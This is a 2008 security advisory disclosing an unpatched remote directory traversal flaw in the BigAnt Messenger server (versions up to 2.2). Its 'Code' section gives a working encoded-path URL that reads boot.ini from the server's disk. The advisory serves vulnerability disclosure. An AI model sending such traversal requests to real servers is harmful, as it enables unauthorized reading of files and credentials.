####################################################################### Luigi Auriemma Application: BigAnt Messenger http://www.bigantsoft.com/bigant.html Versions: <= 2.2 Platforms: Windows Bug: Directory traversal Exploitation: remote Date: 16 Apr 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "BigAnt is a secure corporate instant messaging system, both instant messaging server and client included." ####################################################################### ====== 2) Bug ====== The BigAnt server (AntServer.exe) is affected by a directory traversal vulnerability which allows an attacker to download any file from the disk in which is installed the program. ####################################################################### =========== 3) The Code =========== http://SERVER:6080/..%2f..\..%5c..\..%2f../boot.ini ####################################################################### ====== 4) Fix ====== No fix #######################################################################